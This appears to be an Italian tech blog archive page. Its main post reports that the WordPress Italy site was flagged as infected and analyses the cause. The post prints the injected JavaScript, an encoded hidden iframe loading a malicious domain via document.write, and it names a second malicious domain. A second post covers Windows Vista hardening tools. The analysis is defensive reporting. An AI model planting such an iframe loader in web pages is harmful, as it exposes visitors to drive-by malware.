Categorie
Twitter

Tweet del giorno 2014-05-27

Categorie
Twitter

Tweet del giorno 2014-05-26

Categorie
Twitter

Tweet del giorno 2014-05-25

Categorie
Twitter

Tweet del giorno

Categorie
Twitter

Tweet del giorno 2014-05-23

Categorie
Security

WordPress Italy è stato infettato

Questa mattina mi sono accorto per caso che nelle SERP di Google il sito www.wordpress-it.it, cioè WordPress Italy, risulta segnalato come sito infetto. Ecco la SERP di Google con evidenziato il messaggio “Questo sito potrebbe arrecare danni al tuo computer”:

wordpress italy infetto

Andando ad analizzare il sorgente del sito con Malzilla, utile per scaricare in modo sicuro il sito senza navigarci, appare chiaro come il problema risieda in un iframe che reindirizza al dominio vosstaniecorpov.com. Questo è l’iframe iniettato su WordPress Italy:

enc = "%3Ciframe%20src%3D%27http%3A//vosstaniecorpov.com/in.php%27%20width%3D%271%27%20height%3D%271%27%20frameborder%3D%270%27%3E%3C/iframe%3E"; 
dec = unescape(enc); 
document.write(dec);

Con una macchina virtuale ho navigato il sito con Firefox (6.0.2) e vengono effettuate anche delle chiamate a http://daitetrafu.com, segnalato anch’esso come sito malevolo (anche se stranamente non da VirusTotal ma solo dalla funzione di riconoscimento siti nocivi di Firefox e di Chrome) come si vede in figura:

dainetrafu sito malevolo

Difficile capire al momento quale sia la falla che è stata sfruttata dagli attaccanti, probabile ci sia una vulnerabilità nel tema usato da WordPress Italy oppure in qualche plugin dato che la versione di WordPress utilizzata è la 3.3 leggendo il file http://www.wordpress-it.it/readme.html.

Categorie
Security Windows

Aumentare la sicurezza di Windows Vista Home Premium

polsedit

In Vista Home Premium non sono presenti degli strumenti molto utili a impostare policy di sicurezza per il sistema: secpol.msc e gpedit.msc. Molte delle impostazioni permesse dai due tool sono possibili andando a modificare il registro di sistema con regedit ma non è un metodo molto veloce e soprattutto bisogna sapere bene cosa si fa, pena il malfunzionamento del sistema.

Ecco perché possono essere utili due tool freeware che permettano di avere un controllo avanzato della sicurezza del sistema: Ultimate Windows Tweaker e polsedit. Il primo è un programma in grado di cambiare a proprio piacimento molti settaggi di Vista (un po’ come avviene con programmi tipo TweakVI) ma a differenza di molti tweaker è un singolo eseguibile che non necessita installazione, ha un’interfaccia davvero semplice e consente un hardening di Vista efficace.

Nella sezione “Security” di Ultimate Windows Tweaker si può intervenire su molti parametri: è possibile disabilitare regedit, il Pannello di Controllo, il prompt dei comandi, il task manager, si possono disabilitare moltissime applicazioni (es. Windows Mail o Windows Firewall) ed disattivare gli aggiornamenti di sistema.

Per quanto riguarda invece polsedit si tratta anche in questo caso di un singolo eseguibile che offre un’interfaccia molto simile a secpol e un grado di security hardening avanzato. Selezionando “User Right Assignment” è possibile intervenire sui permessi utente. Per ogni azione si possono definire utenti o gruppi abilitati a compiere quello specifico task.

Insomma due freeware davvero molto utili, inoltre Ultimate Windows Tweaker può essere apprezzato oltre che per le funzioni di sicurezza anche per le moltissime personalizzazioni applicabili a Vista.